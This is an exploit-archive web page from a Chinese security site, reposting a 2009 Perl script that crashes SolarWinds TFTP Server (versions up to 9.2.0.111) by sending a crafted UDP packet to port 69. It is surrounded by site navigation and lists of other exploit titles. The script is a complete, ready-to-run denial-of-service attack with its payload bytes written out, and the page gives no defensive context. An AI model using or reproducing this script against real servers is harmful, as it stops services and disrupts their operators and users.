首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit
来源:www.vfocus.net 作者:Greetz 发布时间:2009-09-01  

#!/usr/bin/perl
# SolarWinds TFTP Server <=9.2.0.111 Remote DoS Exploit
# by Gaurav Baruah
# TFTP Server Service stops after payload
# is sent, and has to be started again in Config
# Tested on XP SP3
# Big thnx: dragunov
# Greetz: Sanjay

use IO::Socket;
$port = "69";
$host = "127.0.0.1";
$tftpudp = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$boom=
"\x00\x06\x54\x9d\x68\x21\xde\x59\x30\x9a\x0b\xb5\xd4\x94\x94\x42\x3c\xeb\xc5".
"\xc1\xe8\x7d\x31\x34\xee\xd8\x60\x41\x8f\x92\x25\x9c\x5c\xcc\x78\x6a";
$tftpudp->send($boom);


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Swift Ultralite 1.032 (.M3U) L
·Ultimate Player 1.56b (.m3u/up
·Linux Kernel 2.4/2.6 sock_send
·MailEnable 1.52 HTTP Mail Serv
·Linux Kernel < 2.6.31-rc7 AF_I
·Hex Workshop 4.23//5.1//6.0 (.
·Linux Kernel 2.6 < 2.6.19 (32b
·Media Jukebox 8 (.pls) Univers
·Microsoft IIS 5.0/6.0 FTP Serv
·Apple iPhone 2.2.1/3.x (Mobile
·osCommerce Online Merchant 2.2
·Microsoft IIS 5.0 FTP Server R
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved